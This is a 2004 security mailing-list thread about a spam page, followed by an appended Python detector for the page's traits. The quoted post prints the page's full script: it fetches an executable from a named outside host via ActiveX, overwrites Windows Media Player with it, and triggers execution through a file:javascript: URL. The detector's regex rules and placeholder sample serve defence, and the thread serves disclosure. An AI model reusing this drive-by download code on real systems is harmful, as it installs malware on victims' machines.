Message-ID: <009c01c3ea13$fc59af00$5746370a@nsp.co.nz>
From: venom at gen-x.co.nz (VeNoMouS)
Subject: Old Hack?
hrm i got this bounce back from hotmail when i emailed back
Attachment Details:-
Attachment Name: N/A
File: Infected.msg
Infected? Yes
Repaired? No
Blocked? No
Deleted? No
Virus Name: VBS/Psyme
^^^ there's your virus name apparently..., even though i scanned it with sweep
(sophos) and it didn't pick anything up.
----- Original Message -----
From: "axid3j1al axid3j1al" <axid3j1al@...mail.com>
To: <full-disclosure@...ts.netsys.com>
Sent: Tuesday, February 03, 2004 4:40 PM
Subject: [Full-Disclosure] Old Hack?
> Has anyone seen this little code injection hack?
>
> Is this old?
>
>
> Email has subject line "congranulations! you won $1169"
>
> with body
>
> http://sinaraevent.com/bbs/zipcode/6.htm
>
>
> and code
>
> <textarea id="code" style="display:none;">
>
> var x = new ActiveXObject("Microsoft.XMLHTTP");
> x.Open("GET", "http://sinaraevent.com/bbs/zipcode/man.exe",0);
> x.Send();
>
> var s = new ActiveXObject("ADODB.Stream");
> s.Mode = 3;
> s.Type = 1;
> s.Open();
> s.Write(x.responseBody);
>
> s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);
> location.href = "mms://";
>
> </textarea>
>
> <script language="javascript">
>
> function preparecode(code) {
> result = '';
> lines = code.split(/\r\n/);
> for (i=0;i<lines.length;i++) {
>
> line = lines[i];
> line = line.replace(/^\s+/,"");
> line = line.replace(/\s+$/,"");
> line = line.replace(/'/g,"\\'");
> line = line.replace(/[\\]/g,"\\\\");
> line = line.replace(/[/]/g,"%2f");
>
> if (line != '') {
> result += line +'\\r\\n';
> }
> }
> return result;
> }
>
> function doit() {
> mycode = preparecode(document.all.code.value);
> myURL = "file:javascript:eval('" + mycode + "')";
> window.open(myURL,"_media")
> }
>
>
> window.open("error.jsp","_media");
>
> setTimeout("doit()", 5000);
>
>
> </script>
>
> braindwish has expired
>
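Added example, not part of either post above: a small static check for the traits visible in the quoted page (XMLHTTP fetch of an .exe, ADODB.Stream with SaveToFile, a file:javascript: URL opened in the "_media" target), the kind of content rule a mail or web gateway could apply when a signature scanner stays silent. The indicator names, the verdict levels and the sample documents are assumptions made for this example; the sample uses a placeholder host and path.

```python
import re

# Traits of the quoted page; each is weak alone, the combinations are not.
INDICATORS = {
    "xmlhttp_activex": re.compile(r"""ActiveXObject\s*\(\s*["']Microsoft\.XMLHTTP["']""", re.I),
    "adodb_stream": re.compile(r"""ActiveXObject\s*\(\s*["']ADODB\.Stream["']""", re.I),
    "save_to_file": re.compile(r"\.SaveToFile\s*\(", re.I),
    "exe_fetch": re.compile(r"""\.Open\s*\(\s*["']GET["']\s*,\s*["'][^"']+\.exe["']""", re.I),
    "media_bar_target": re.compile(r"""window\.open\s*\([^)]*["']_media["']""", re.I),
    "file_javascript_url": re.compile(r"file:javascript:", re.I),
    "hidden_code_textarea": re.compile(r"<textarea[^>]*display\s*:\s*none", re.I),
}

def scan(html):
    """Return the sorted names of every indicator found in the HTML text."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(html))

def verdict(html):
    """Classify a document as 'block', 'review' or 'clean'."""
    hits = set(scan(html))
    # Fetch + binary stream + write to disk: the download-and-save chain.
    drops_file = {"xmlhttp_activex", "adodb_stream", "save_to_file"} <= hits
    # Script URL opened in the "_media" window target, as doit() does.
    media_js = {"media_bar_target", "file_javascript_url"} <= hits
    if drops_file or media_js:
        return "block"
    return "review" if hits else "clean"

# Constructed sample: same shape as the quoted page, placeholder host and path.
SAMPLE = r'''<textarea id="code" style="display:none;">
var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET", "http://example.invalid/placeholder.exe",0);
var s = new ActiveXObject("ADODB.Stream");
s.Write(x.responseBody);
s.SaveToFile("C:\\placeholder\\out.exe",2);
</textarea>
<script>
myURL = "file:javascript:eval('" + mycode + "')";
window.open(myURL,"_media")
</script>'''

# Constructed sample: legacy AJAX page that shares one trait only.
LEGACY_AJAX = '<script>var r = new ActiveXObject("Microsoft.XMLHTTP"); r.open("GET", "/api/status", true);</script>'

if __name__ == "__main__":
    for label, doc in (("sample", SAMPLE), ("legacy ajax", LEGACY_AJAX), ("plain", "<p>hello</p>")):
        print(label, verdict(doc), scan(doc))
```

String matching like this only catches unobfuscated copies, so "clean" means "no known trait found", not "safe".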